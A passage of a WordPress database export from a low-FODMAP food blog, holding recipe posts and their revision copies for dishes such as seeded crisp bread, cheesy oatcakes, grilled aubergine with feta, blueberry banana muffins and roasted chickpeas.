Place a slice of spelt sourdough on a plate and top with wilted spinach, add a softly poached egg and finish with a sprinkling of sea salt

Now tuck in...... the runny egg is delicious with the firm texture of the bread and the spinach finishes off the flavour nicely . I Love it, this is definitely on my good breakfast recipe list.

\n\n\n\n
\"sourdough
\n\n\n\n
\"sourdough
\n\n\n\n
\"Sourdough
\n','Poached egg on spelt sourdough bread','','inherit','closed','closed','','4676-revision-v1','','','2020-04-05 00:01:49','2020-04-05 00:01:49','',4676,'http://tummyrevolution.com/4676-revision-v1/',0,'revision','',0),(4678,1,'2020-04-12 03:07:00','2020-04-12 03:07:00','\n

This is a great snack or quick lunch. You just mix together the ingredients and add them to your favourite wheat free bread. Cottage cheese is relatively low in fat an high in calcium, B vitamin, D vitamin and vitamin A. Plain cottage cheese can seem a bit bland but mixed with other ingredients like in this recipe, it takes on a totally different flavour and taste fantastic on an open sandwich.

\n\n\n\n

Cottage cheese is low FODMAP which is great as it\'s tummy friendly. Avoid cottage cheese with added onion, garlic or other high FODMAP foods and spices as these can trigger digestive symptoms.

\n\n\n\n

MAKES 1 SERVING

INGREDIENTS

\n\n\n\n
  • 2 slices gluten free toast (non dairy)
  • 2/3 cup (150g ) cottage cheese
  • 2 tomatoes
  • 1 spring onion (green part only)
  • 1/4 cup (100g) Parma ham
  • Salt and pepper to taste
\n\n\n\n

DIRECTIONS

\n\n\n\n
  1. Chop the tomatoes into small pieces.
  2. Slice the Parma ham into small strips.
  3. Finely chop the green part of a spring onion.
  4. Add the cottage cheese, chopped tomatoes, spring onion and Parma ham to a medium sized bowl.
  5. Season with salt and pepper.
  6. Spoon the mix onto the gluten free toast and serve.
\n\n\n\n
  • TIP
    You can substitute the Parma ham with smoked salmon, cooked chicken or smokedmackerel.
\n\n\n\n
\"\"/
\n','OPEN SANDWICH WITH COTTAGE CHEESE MIX','','publish','open','open','','open-sandwich-with-cottage-cheese-mix','','','2020-04-12 23:03:36','2020-04-12 23:03:36','',0,'http://tummyrevolution.com/?p=4678',0,'post','',0),(4679,1,'2020-04-05 00:03:31','2020-04-05 00:03:31','\n

This is a great snack or quick lunch. You just mix together the ingredients and add them to your favourite wheat free bread. Cottage cheese is relatively low in fat an high in calcium, B vitamin, D vitamin and vitamin A. Plain cottage cheese can seem a bit bland but mixed with other ingredients like in this recipe, it takes on a totally different flavour and taste fantastic on an open sandwich.

\n\n\n\n

Cottage cheese is low FODMAP which is great as it\'s tummy friendly. Avoid cottage cheese with added onion, garlic or other high FODMAP foods and spices as these can trigger digestive symptoms.

\n\n\n\n

MAKES 1 SERVING

INGREDIENTS

\n\n\n\n
  • 2 slices gluten free toast (non dairy)
  • 2/3 cup (150g ) cottage cheese
  • 2 tomatoes
  • 1 spring onion (green part only)
  • 1/4 cup (100g) Parma ham
  • Salt and pepper to taste
\n\n\n\n

DIRECTIONS

\n\n\n\n
  1. Chop the tomatoes into small pieces.
  2. Slice the Parma ham into small strips.
  3. Finely chop the green part of a spring onion.
  4. Add the cottage cheese, chopped tomatoes, spring onion and Parma ham to a medium sized bowl.
  5. Season with salt and pepper.
  6. Spoon the mix onto the gluten free toast and serve.
\n\n\n\n
  • TIP
    You can substitute the Parma ham with smoked salmon, cooked chicken or smokedmackerel.
\n\n\n\n
\"\"/
\n','OPEN SANDWICH WITH COTTAGE CHEESE MIX','','inherit','closed','closed','','4678-revision-v1','','','2020-04-05 00:03:31','2020-04-05 00:03:31','',4678,'http://tummyrevolution.com/4678-revision-v1/',0,'revision','',0),(4680,1,'2020-04-05 00:04:40','2020-04-05 00:04:40','\n

This Seeded Crisp Bread is full of so many nutritious ingredients and is really  handy to have at home. You can have it with almost anything: soups, salads, dips or simply butter and a slice of cheese. 

\n\n\n\n

One of the ingredients are psyllium husk and you may not be able to find this in your local supermarket. It is a necessity for this recipe though as it\'s the wheat free ingredient that holds all the ingredients together. You can find it in most health stores or order it online.I had never used Psyllium husk before I started the low FODMAP diet but it\'s frequently used in gluten free baking so it\'s worth familiarising yourself with it. Ground psyllium husk powder is 100% pulverized psyllium husk shells and is used to give a bread-like texture to what you\'re baking. It is a type of binder used to create and strengthen the protein networks in the different flours used in gluten free baking.
It\'s a bit like the glue that holds everything together and stops your cakes. bread and in this case crisp bread from falling apart when you touch it.

If you\'re not familiar with gluten free baking then crisp bread is a great place to start as it\'s an easy but great recipe.

Hope you enjoy it :)

\n\n\n\n
\"\"/
\n\n\n\n

MAKES 4 SERVINGS

\n\n\n\n

60g (1/3 cup) sunflower seeds

\n\n\n\n

30g (¼cup) oats (not rolled)

60g (¼cup)linseeds

\n\n\n\n

60g (¼cup) sesame seeds

\n\n\n\n

120g (2/3 cup) pumpkin seeds

\n\n\n\n

2 tbsp psyllium husk (to be found at any health store or online)

\n\n\n\n

2 tbsp gluten free flour

1 tsp salt

\n\n\n\n

500ml (2 cups) water

\n\n\n\n

Topping: sea salt


INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 160°C (320°F)

  2. In a large bowl, mix together all ingredients apart from the sea salt. Let it sit for 5 minutes

  3. Line a baking tray with baking paper and spread the mixture evenly. 

  4. Sprinkle over some sea salt and bake in the oven for 60-70 minutes. The bread should be crispy when ready.

  5. Let the crisp bread cool and carefully remove the bread from the baking paper.
  6. Break the bread into serving sizes.
\n','Seeded Crisp bread','','publish','open','open','','seeded-crisp-bread','','','2020-04-06 01:54:56','2020-04-06 01:54:56','',0,'http://tummyrevolution.com/?p=4680',0,'post','',0),(4681,1,'2020-04-05 00:04:40','2020-04-05 00:04:40','\n

This Seeded Crisp Bread is full of so many nutritious ingredients and is really  handy to have at home. You can have it with almost anything: soups, salads, dips or simply butter and a slice of cheese. 

\n\n\n\n

One of the ingredients are psyllium husk and you may not be able to find this in your local supermarket. It is a necessity for this recipe though as it\'s the wheat free ingredient that holds all the ingredients together. You can find it in most health stores or order it online.I had never used Psyllium husk before I started the low FODMAP diet but it\'s frequently used in gluten free baking so it\'s worth familiarising yourself with it. Ground psyllium husk powder is 100% pulverized psyllium husk shells and is used to give a bread-like texture to what you\'re baking. It is a type of binder used to create and strengthen the protein networks in the different flours used in gluten free baking.
It\'s a bit like the glue that holds everything together and stops your cakes. bread and in this case crisp bread from falling apart when you touch it.

If you\'re not familiar with gluten free baking then crisp bread is a great place to start as it\'s an easy but great recipe.

Hope you enjoy it :)

\n\n\n\n
\"\"/
\n\n\n\n

MAKES 4 SERVINGS

\n\n\n\n

60g (1/3 cup) sunflower seeds

\n\n\n\n

30g (¼cup) oats (not rolled)

60g (¼cup)linseeds

\n\n\n\n

60g (¼cup) sesame seeds

\n\n\n\n

120g (2/3 cup) pumpkin seeds

\n\n\n\n

2 tbsp psyllium husk (to be found at any health store or online)

\n\n\n\n

2 tbsp gluten free flour

1 tsp salt

\n\n\n\n

500ml (2 cups) water

\n\n\n\n

Topping: sea salt


INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 160°C (320°F)

  2. In a large bowl, mix together all ingredients apart from the sea salt. Let it sit for 5 minutes

  3. Line a baking tray with baking paper and spread the mixture evenly. 

  4. Sprinkle over some sea salt and bake in the oven for 60-70 minutes. The bread should be crispy when ready.

  5. Let the crisp bread cool and carefully remove the bread from the baking paper.
  6. Break the bread into serving sizes.
\n','Seeded Crisp bread','','inherit','closed','closed','','4680-revision-v1','','','2020-04-05 00:04:40','2020-04-05 00:04:40','',4680,'http://tummyrevolution.com/4680-revision-v1/',0,'revision','',0),(4682,1,'2020-04-05 00:07:35','2020-04-05 00:07:35','\n

\n\nOatcakes is one of my favourite snacks and I have it almost daily. Oatcakes are a great way of topping up your daily fibre intake, which you need to watch if you\'re for example are on the low FODMAP diet. Oats are also a naturally gluten-free whole grain and a great source of important vitamins, minerals, and antioxidants. Oatcakes are great with almost anything. You can have it with cheese and some veg such as pepper or tomato, with soup, salad or with some fruit such as grapes. It\'s also great to have on the go or as an emergency snack in your bag. I am out and about a lot and oatcakes are great to have at hand if I need something quickly to get me by.

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve always bought my oatcakes so I was so happy to come across this recipe on Instagram and to learn how easy it was to make them myself. The original recipe is by Antonia at www.fodmapfriendlyeating.wordpress.com. She has got some lovely FODMAP friendly recipes on her blog so go check her out for some inspiration.  I changed the recipe slightly, which is why I\'ve added it below. I used a bit less oats as I didn\'t use a food processor. I have also added rosemary which is a herb I really like in my oatcakes. For variety you can try other spices too such as cayenne pepper, oregano, thyme, pepper or turmeric.
They were so easy to make and with only a few ingredients. I would really recommend trying them out. They are so great in every way.
 INGREDIENTS

\n\n\n\n
  • 300 ml / 1.5 cups oats
  • 1/2 sea salt
  • 1 egg 
  • 1 cup grated cheese (choose any hard cheese such as cheddar)
  • 1 tsp dried or fresh rosemary 
  • 1-2 tbsp lactose free milk, almond milk or water
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 190° C (350°F)
  2. Whisk the egg a little in a bowl, then add to the oats and mix.
  3. Add the salt and rosemary (you can also add other spices and herbs such as turmeric, cayenne pepper, oregano, pepper if you want to experiment with flavours)
  4. Then add the milk or water until you feel the mixture just comes together.
  5. Divide the mixture into 6-8 balls and then add them to a lined baking tray.
  6. Press the balls down and shape into round shapes. They don\'t need to be perfect though. If the dough get\'s sticky and difficult to shape, rinse your hands in water and leave them wet as a little bit of moisture will help.
  7. Bake for about 15-20 minutes or until slightly golden brown around the edges.
  8. Allow to cool, then store in a tin.
\n','Cheesy Oatcakes with Rosemary','','publish','open','open','','cheesy-oatcakes-with-rosemary','','','2020-04-06 01:55:28','2020-04-06 01:55:28','',0,'http://tummyrevolution.com/?p=4682',0,'post','',0),(4683,1,'2020-04-05 00:07:35','2020-04-05 00:07:35','\n

\n\nOatcakes is one of my favourite snacks and I have it almost daily. Oatcakes are a great way of topping up your daily fibre intake, which you need to watch if you\'re for example are on the low FODMAP diet. Oats are also a naturally gluten-free whole grain and a great source of important vitamins, minerals, and antioxidants. Oatcakes are great with almost anything. You can have it with cheese and some veg such as pepper or tomato, with soup, salad or with some fruit such as grapes. It\'s also great to have on the go or as an emergency snack in your bag. I am out and about a lot and oatcakes are great to have at hand if I need something quickly to get me by.

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve always bought my oatcakes so I was so happy to come across this recipe on Instagram and to learn how easy it was to make them myself. The original recipe is by Antonia at www.fodmapfriendlyeating.wordpress.com. She has got some lovely FODMAP friendly recipes on her blog so go check her out for some inspiration.  I changed the recipe slightly, which is why I\'ve added it below. I used a bit less oats as I didn\'t use a food processor. I have also added rosemary which is a herb I really like in my oatcakes. For variety you can try other spices too such as cayenne pepper, oregano, thyme, pepper or turmeric.
They were so easy to make and with only a few ingredients. I would really recommend trying them out. They are so great in every way.
 INGREDIENTS

\n\n\n\n
  • 300 ml / 1.5 cups oats
  • 1/2 sea salt
  • 1 egg 
  • 1 cup grated cheese (choose any hard cheese such as cheddar)
  • 1 tsp dried or fresh rosemary 
  • 1-2 tbsp lactose free milk, almond milk or water
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 190° C (350°F)
  2. Whisk the egg a little in a bowl, then add to the oats and mix.
  3. Add the salt and rosemary (you can also add other spices and herbs such as turmeric, cayenne pepper, oregano, pepper if you want to experiment with flavours)
  4. Then add the milk or water until you feel the mixture just comes together.
  5. Divide the mixture into 6-8 balls and then add them to a lined baking tray.
  6. Press the balls down and shape into round shapes. They don\'t need to be perfect though. If the dough get\'s sticky and difficult to shape, rinse your hands in water and leave them wet as a little bit of moisture will help.
  7. Bake for about 15-20 minutes or until slightly golden brown around the edges.
  8. Allow to cool, then store in a tin.
\n\n\n\n
\"\"
\n','Cheesy Oatcakes with Rosemary','','inherit','closed','closed','','4682-revision-v1','','','2020-04-05 00:07:35','2020-04-05 00:07:35','',4682,'http://tummyrevolution.com/4682-revision-v1/',0,'revision','',0),(4684,1,'2020-04-05 00:07:56','2020-04-05 00:07:56','\n

\n\nOatcakes is one of my favourite snacks and I have it almost daily. Oatcakes are a great way of topping up your daily fibre intake, which you need to watch if you\'re for example are on the low FODMAP diet. Oats are also a naturally gluten-free whole grain and a great source of important vitamins, minerals, and antioxidants. Oatcakes are great with almost anything. You can have it with cheese and some veg such as pepper or tomato, with soup, salad or with some fruit such as grapes. It\'s also great to have on the go or as an emergency snack in your bag. I am out and about a lot and oatcakes are great to have at hand if I need something quickly to get me by.

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve always bought my oatcakes so I was so happy to come across this recipe on Instagram and to learn how easy it was to make them myself. The original recipe is by Antonia at www.fodmapfriendlyeating.wordpress.com. She has got some lovely FODMAP friendly recipes on her blog so go check her out for some inspiration.  I changed the recipe slightly, which is why I\'ve added it below. I used a bit less oats as I didn\'t use a food processor. I have also added rosemary which is a herb I really like in my oatcakes. For variety you can try other spices too such as cayenne pepper, oregano, thyme, pepper or turmeric.
They were so easy to make and with only a few ingredients. I would really recommend trying them out. They are so great in every way.
 INGREDIENTS

\n\n\n\n
  • 300 ml / 1.5 cups oats
  • 1/2 sea salt
  • 1 egg 
  • 1 cup grated cheese (choose any hard cheese such as cheddar)
  • 1 tsp dried or fresh rosemary 
  • 1-2 tbsp lactose free milk, almond milk or water
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 190° C (350°F)
  2. Whisk the egg a little in a bowl, then add to the oats and mix.
  3. Add the salt and rosemary (you can also add other spices and herbs such as turmeric, cayenne pepper, oregano, pepper if you want to experiment with flavours)
  4. Then add the milk or water until you feel the mixture just comes together.
  5. Divide the mixture into 6-8 balls and then add them to a lined baking tray.
  6. Press the balls down and shape into round shapes. They don\'t need to be perfect though. If the dough get\'s sticky and difficult to shape, rinse your hands in water and leave them wet as a little bit of moisture will help.
  7. Bake for about 15-20 minutes or until slightly golden brown around the edges.
  8. Allow to cool, then store in a tin.
\n','Cheesy Oatcakes with Rosemary','','inherit','closed','closed','','4682-revision-v1','','','2020-04-05 00:07:56','2020-04-05 00:07:56','',4682,'http://tummyrevolution.com/4682-revision-v1/',0,'revision','',0),(4685,1,'2020-04-05 00:08:27','2020-04-05 00:08:27','\n

I love the look of aubergine or eggplant, as it\'s called in some parts of the world. It has such a beautiful deep purple colour and I often find myself wanting to buy one and cook something with it, especially as aubergine is low FODMAP and tummy friendly. The problem is that I often don\'t know what to cook with it. I find the consistency can be soft and squishy when cooked, and I don\'t really like this. Adding aubergine to stew type dish is therefore not my thing. I\'ve tried grilling my aubergine a few times and it\'s tasted ok, but as aubergine isn\'t very flavoursome in itself, just grilling it hasn\'t done much for my taste buds which is why I don\'t tend to buy aubergine that often.....until the other day when I came across this recipe by Kalyn at www.kalynskitchen.com. Her aubergine recipe is absolutely fantastic. The combination of grilled aubergine, mint, feta and a cumin infused dressing compliment each other so well and it\'s is a real winner. I just couldn\'t get enough and ate it all in one go. Kalyn has lots of other great gluten free, low-carb recipes on her website so go and check her out  www.kalynskitchen.com

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve had to change the recipe a bit to make it low-FODMAP and gut friendly and I also changed the quantities as I only had one aubergine. You\'ll find my gut friendly adapted recipe below.

\n\n\n\n

Here are some health benefits you can get from eating aubergine:

\n\n\n\n

Aubergines are an excellent source of dietary fibre. They are also a good source of vitamins B1 and B6 and potassium. In addition it is high in the minerals coppermagnesium and manganese. Aubergines are rich in antioxidants, specifically nasunin found in aubergine skin - which gives it its purple colour.

https://www.bbcgoodfood.com/howto/guide/ingredient-focus-aubergines

\n\n\n\n

INGREDIENTS:

\n\n\n\n
  • 1 large eggplant, cut in slices
  • about 1 tsp salt, for salting the aubergine before cooking. (I think the salt really improves the flavour but you can skip it if you prefer)
  • 1 tbsp olive oil, for brushing the aubergine slices
  • 1 good handful of fresh mint leaves, chopped (Or use a mix of other fresh herb of your choice.)
  • 1/4 cup (50-80 grams) crumbled Feta 
\n\n\n\n

VINAIGRETTE INGREDIENTS:

\n\n\n\n
  • 1/4 tsp salt
  • 1 tbsp fresh lemon juice
  • 1 spring onion (green part only) finely chopped/sliced
  • 1/4 tsp ground cumin 
  • 1 pinch cayenne pepper
  • 1/2 tsp all-purpose seasoning (can be left out)
  • 2 tbsp garlic infused oil
  • 1 tbsp extra-virgin olive oil
\n\n\n\n

DIRECTIONS:

\n\n\n\n
  1. Slice the aubergine in 1 cm slices.
  2. Lay the aubergine slices out on kitchen paper towel and sprinkle with salt. on both sides. Let the aubergine sit for about 20 minutes, or until you see beads of water released. (You can skip this part if you prefer to to avoid using salt but it does make the aubergine extra tasty. Most of the last also gets wiped of after resting)
  3. While the aubergine rests, put salt, lemon juice, and spring onion into food processor and pulse until all ingredients are well combined, then let sit for 10 minutes. (You can also just combine the ingredients if you don\'t have access to a food processor). After ten minutes, put mixture in small bowl, stir in ground cumin, Cayenne pepper, and All Seasoning if using, then whisk in the garlic infused oil and the olive oil.
  4.  Finely chop the fresh mint (or other herbs) and crumble the Feta
  5. Once the aubergine has rested for 20 minutes, wipe off the water (and salt) with dry kitchen paper towel and put it on a baking paper sheet. Brush aubergine slices with olive oil on both sides.
  6. Heat a griddle pan on high heat (you can also grill the aubergine on a BBQ). Place the aubergine slices in the pan. If you want criss-cross grill marks, grill the aubergine about 3-4 minutes, then check if brown. You might want to move them a little if you want a cross pattern, then cook about 3-4 minutes more.
  7. Turn aubergine over and cook 3-4 minutes more on the second side, or until cooked to your liking.
  8. Arrange aubergine on a serving tray and drizzle with cumin infused vinaigrette, then sprinkle the crumbled feta and herbs.
\n\n\n\n
\"\"/
\n','Grilled aubergine with feta, herbs and cumin infused dressing','','publish','open','open','','grilled-aubergine-with-feta-herbs-and-cumin-infused-dressing','','','2020-04-06 01:56:14','2020-04-06 01:56:14','',0,'http://tummyrevolution.com/?p=4685',0,'post','',0),(4686,1,'2020-04-05 00:08:27','2020-04-05 00:08:27','\n

I love the look of aubergine or eggplant, as it\'s called in some parts of the world. It has such a beautiful deep purple colour and I often find myself wanting to buy one and cook something with it, especially as aubergine is low FODMAP and tummy friendly. The problem is that I often don\'t know what to cook with it. I find the consistency can be soft and squishy when cooked, and I don\'t really like this. Adding aubergine to stew type dish is therefore not my thing. I\'ve tried grilling my aubergine a few times and it\'s tasted ok, but as aubergine isn\'t very flavoursome in itself, just grilling it hasn\'t done much for my taste buds which is why I don\'t tend to buy aubergine that often.....until the other day when I came across this recipe by Kalyn at www.kalynskitchen.com. Her aubergine recipe is absolutely fantastic. The combination of grilled aubergine, mint, feta and a cumin infused dressing compliment each other so well and it\'s is a real winner. I just couldn\'t get enough and ate it all in one go. Kalyn has lots of other great gluten free, low-carb recipes on her website so go and check her out  www.kalynskitchen.com

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve had to change the recipe a bit to make it low-FODMAP and gut friendly and I also changed the quantities as I only had one aubergine. You\'ll find my gut friendly adapted recipe below.

\n\n\n\n

Here are some health benefits you can get from eating aubergine:

\n\n\n\n

Aubergines are an excellent source of dietary fibre. They are also a good source of vitamins B1 and B6 and potassium. In addition it is high in the minerals coppermagnesium and manganese. Aubergines are rich in antioxidants, specifically nasunin found in aubergine skin - which gives it its purple colour.

https://www.bbcgoodfood.com/howto/guide/ingredient-focus-aubergines

\n\n\n\n

INGREDIENTS:

\n\n\n\n
  • 1 large eggplant, cut in slices
  • about 1 tsp salt, for salting the aubergine before cooking. (I think the salt really improves the flavour but you can skip it if you prefer)
  • 1 tbsp olive oil, for brushing the aubergine slices
  • 1 good handful of fresh mint leaves, chopped (Or use a mix of other fresh herb of your choice.)
  • 1/4 cup (50-80 grams) crumbled Feta 
\n\n\n\n

VINAIGRETTE INGREDIENTS:

\n\n\n\n
  • 1/4 tsp salt
  • 1 tbsp fresh lemon juice
  • 1 spring onion (green part only) finely chopped/sliced
  • 1/4 tsp ground cumin 
  • 1 pinch cayenne pepper
  • 1/2 tsp all-purpose seasoning (can be left out)
  • 2 tbsp garlic infused oil
  • 1 tbsp extra-virgin olive oil
\n\n\n\n

DIRECTIONS:

\n\n\n\n
  1. Slice the aubergine in 1 cm slices.
  2. Lay the aubergine slices out on kitchen paper towel and sprinkle with salt. on both sides. Let the aubergine sit for about 20 minutes, or until you see beads of water released. (You can skip this part if you prefer to to avoid using salt but it does make the aubergine extra tasty. Most of the last also gets wiped of after resting)
  3. While the aubergine rests, put salt, lemon juice, and spring onion into food processor and pulse until all ingredients are well combined, then let sit for 10 minutes. (You can also just combine the ingredients if you don\'t have access to a food processor). After ten minutes, put mixture in small bowl, stir in ground cumin, Cayenne pepper, and All Seasoning if using, then whisk in the garlic infused oil and the olive oil.
  4.  Finely chop the fresh mint (or other herbs) and crumble the Feta
  5. Once the aubergine has rested for 20 minutes, wipe off the water (and salt) with dry kitchen paper towel and put it on a baking paper sheet. Brush aubergine slices with olive oil on both sides.
  6. Heat a griddle pan on high heat (you can also grill the aubergine on a BBQ). Place the aubergine slices in the pan. If you want criss-cross grill marks, grill the aubergine about 3-4 minutes, then check if brown. You might want to move them a little if you want a cross pattern, then cook about 3-4 minutes more.
  7. Turn aubergine over and cook 3-4 minutes more on the second side, or until cooked to your liking.
  8. Arrange aubergine on a serving tray and drizzle with cumin infused vinaigrette, then sprinkle the crumbled feta and herbs.
\n\n\n\n
\"\"/
\n','Grilled aubergine with feta, herbs and cumin infused dressing','','inherit','closed','closed','','4685-revision-v1','','','2020-04-05 00:08:27','2020-04-05 00:08:27','',4685,'http://tummyrevolution.com/4685-revision-v1/',0,'revision','',0),(4687,1,'2020-04-05 00:10:23','2020-04-05 00:10:23','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

I made these blueberry and banana muffins some time ago but I realised I\'d forgotten to post the recipe so I decided to do it today.

There is a reason for why I\'m posting it today and that\'s because it\'s my twins 10th birthday today and during my pregnancy I had a lot of blueberry and banana muffins to control my nausea. I didn\'t really have a craving for them as such but found that if I had a blueberry and banana muffin in between meals I didn\'t feel so nauseous. I used to make my own muffins or when I was feeling really ill my husband made them. I think he became an expert in making these muffins because I had then every day. Luckily the twins turned out fine despite me having about a thousand muffin during my pregnancy :)
Here they are xxx

Bananas and berries in muffins are just great idea as they make them really moist and delicious. I am a real banana fan anyway and probably eat in the region of 2-3 bananas per day. They are such a good in between meal snack and soothing for your tummy too. Blueberry and banana muffins are perhaps not quite as healthy as the banana on it\'s own but still, all the fruit and berries are still in there so surely it can;t be that bad and who doesn\'t need a treat once in a while...right? You can freeze these muffins and just grab one when you get that sweet craving. They taste great with a cup of tea so that\'s how I will have my one this afternoon. Hope you enjoy the too x

INGREDIENTS 

\n\n\n\n
  • 3 large ripe bananas
  • 3cup sugar
  • 1 egg (lightly whisked)
  • 1cup butter (melted) or vegetable oil
  • 1 cup bluberries
  • 1 teaspoon baking soda
  • 1 teaspoon baking powder 
  • 12teaspoon salt
  • 1cups gluten free flour mix
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 190 degrees C / 375 degrees F

2. Mash bananas in a large mixing bowl

3. Lightly whisk the eggs and add to the bowl followed by the sugar

4. Melt the butter and add to the mix followed by the blueberries

5. Combine all the dry ingredients and gently stir into the banana mixture

6. Pour the mixture into 12 muffin cups

\n\n\n\n

7. Bake for 20 minutes or until slightly golden brown

\n\n\n\n

8. Let the muffins cools on a rack

\n\n\n\n

Suggestion: serve with a cup of tea.

\n\n\n\n

Can be frozen in an airtight container

\n\n\n\n

Enjoy!

\n','Gluten Free Blueberry and banana muffins','','publish','open','open','','gluten-free-blueberry-and-banana-muffins','','','2020-04-05 00:10:25','2020-04-05 00:10:25','',0,'http://tummyrevolution.com/?p=4687',0,'post','',0),(4688,1,'2020-04-05 00:10:23','2020-04-05 00:10:23','\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

I made these blueberry and banana muffins some time ago but I realised I\'d forgotten to post the recipe so I decided to do it today.

There is a reason for why I\'m posting it today and that\'s because it\'s my twins 10th birthday today and during my pregnancy I had a lot of blueberry and banana muffins to control my nausea. I didn\'t really have a craving for them as such but found that if I had a blueberry and banana muffin in between meals I didn\'t feel so nauseous. I used to make my own muffins or when I was feeling really ill my husband made them. I think he became an expert in making these muffins because I had then every day. Luckily the twins turned out fine despite me having about a thousand muffin during my pregnancy :)
Here they are xxx

Bananas and berries in muffins are just great idea as they make them really moist and delicious. I am a real banana fan anyway and probably eat in the region of 2-3 bananas per day. They are such a good in between meal snack and soothing for your tummy too. Blueberry and banana muffins are perhaps not quite as healthy as the banana on it\'s own but still, all the fruit and berries are still in there so surely it can;t be that bad and who doesn\'t need a treat once in a while...right? You can freeze these muffins and just grab one when you get that sweet craving. They taste great with a cup of tea so that\'s how I will have my one this afternoon. Hope you enjoy the too x

INGREDIENTS 

\n\n\n\n
  • 3 large ripe bananas
  • 3cup sugar
  • 1 egg (lightly whisked)
  • 1cup butter (melted) or vegetable oil
  • 1 cup bluberries
  • 1 teaspoon baking soda
  • 1 teaspoon baking powder 
  • 12teaspoon salt
  • 1cups gluten free flour mix
\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 190 degrees C / 375 degrees F

2. Mash bananas in a large mixing bowl

3. Lightly whisk the eggs and add to the bowl followed by the sugar

4. Melt the butter and add to the mix followed by the blueberries

5. Combine all the dry ingredients and gently stir into the banana mixture

6. Pour the mixture into 12 muffin cups

\n\n\n\n

7. Bake for 20 minutes or until slightly golden brown

\n\n\n\n

8. Let the muffins cools on a rack

\n\n\n\n

Suggestion: serve with a cup of tea.

\n\n\n\n

Can be frozen in an airtight container

\n\n\n\n

Enjoy!

\n','Gluten Free Blueberry and banana muffins','','inherit','closed','closed','','4687-revision-v1','','','2020-04-05 00:10:23','2020-04-05 00:10:23','',4687,'http://tummyrevolution.com/4687-revision-v1/',0,'revision','',0),(4689,1,'2020-04-05 00:11:11','2020-04-05 00:11:11','\n

Chickpeas is one of those foods that are high in FODMAPs but the good news is that the FODMPAs can dissolve in water so canned chickpeas tend to be lower in FODMAPs as some ‘leach’ out into the canning water and are removed when they are drained and rinsed. Canned chickpeas are rated medium in FODMAPs so you can only have a little bit at the time but that\'s great because chickpeas are a good source of vitamins, minerals and fibre. They are also high in protein and can be a good substitute for meat.

\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n
\"\"/
\n\n\n\n

A good way of getting a few daily chickpeas to your diet is to roast them. By doing this yo can add them to all sorts of dishes such as salad\'s, sandwiches and wraps or you simply eat them on their own. You can add different kinds of flavouring, both sweet and savoury to make them taste really great. I choose to use garlic infused oil, oregano and parmesan this time but you can also use spices such as paprika, cayenne pepper chilli powder, ginger, turmeric, lime. If you fancy something a bit sweeter you can use almond butter, vanilla extract or cinnamon and maybe syrup. There\'s lots of varieties to try out.

I had some of my roasted chickpeas as a snack and then I saved some for a wrap I made. They tasted so good in the wrap and gave it some crunch which I really liked.

\n\n\n\n

For the wrap I roasted some aubergine in a griddle pan and mixed chopped up peppers, tomato, cucumber, spring onion (green part only). I also made some FODMAP friendly tzatziki (will have to share that recipe soon) and I had some home made kale pesto left over that I used as well. You can also use other FODMAP friendly vegetables such as roasted courgette, pumpkin or broccoli or raw carrot, spinach, lettuce etc. Just choose your favourites and have a go at mixing them all up. I never used to think you could mix roasted vegetables with raw vegetables in a dish but I now think they can really complement each other as they have different textures and very different flavours.
I was dying to eat this wrap because I was so hungry making it and it just looked so great. It just tasted amazing to and I ate it far too quickly but I just couldn\'t stop myself. 

\n\n\n\n

Here is my recipe for roasted chickpeas. Hope you enjoy it :)

\n\n\n\n

INGREDIENTS

1 can chickpeas (400g)

\n\n\n\n

1.5 tbsp garlic infused olive oil

\n\n\n\n

1/2 tsp dried oregano

\n\n\n\n

2 tbsp grated parmesan 

\n\n\n\n

salt and pepper to taste

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to 200 C° / 392 F°

\n\n\n\n

2. Line a baking tray with parchment paper

\n\n\n\n

3. Drain the water from the chickpeas and and place them on kitchen paper to let the moister transfer to the paper.

\n\n\n\n

4. In a medium bowl mix together the garlic infused, oregano and parmesan. Season with salt and pepper, then add the chickpeas and stir until combined.

\n\n\n\n

5. Place the chickpeas onto the baking tray and spread them out evenly 

\n\n\n\n

6. Roast for 30-40 minutes, staring 2 or 3 times.

\n\n\n\n

7. Let the chickpeas cool before removing them from the tray as it will keep them crunchy. Store in an airtight container for up to 3 days.

\n\n\n\n

Enjoy! 

\n','Wrap with Tummy Friendly roasted chickpeas','','publish','open','open','','wrap-with-tummy-friendly-roasted-chickpeas','','','2020-04-06 22:34:18','2020-04-06 22:34:18','',0,'http://tummyrevolution.com/?p=4689',0,'post','',0),(4690,1,'2020-04-05 00:11:49','2020-04-05 00:11:49','\n

Fruit tastes great on their own but why not add some Christmas excitement by adding some chocolate and nuts. Good quality dark chocolate is good for sensitive tummies and full of antioxidants, which are important to our health. Simply choose fruit that is gut friendly such as pineapple, strawberries, Satsuma, oranges, kiwi or star fruit

\n\n\n\n

Large quantities of fruit are not good if you have a sensitive gut or if you\'re on the low FODMAP diet so stick to a small portion of FODMAP friendly fruits and you should be fine.

Here\'s a list of some other FOMDAP friendly fruits:

\n\n\n\n

Banana - Unripe (i.e green/yellow)
Dragon Fruit
Grapes
Guava
Lemon
Lime
Mandarine
Orange
Passion fruit

The list of FODMAP friendly fruits changes all the time so It\'s important to check Monash University website or the App to make sure you eat the fruits that are best for your gut.

\n\n\n\n
\"\"/
\n\n\n\n

Serves 4, Prep & Cook time 15 min 

INGREDIENTS

\n\n\n\n

5-7 strawberries

\n\n\n\n

10-15 mandarin slices (or use Clementine or Satsuma) 

5-10 pineapple triangle pieces

\n\n\n\n

100 g good quality dark chocolate

\n\n\n\n

A small handful of pecan or macadamia nuts

2 tbsp desiccated coconut (optional)

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
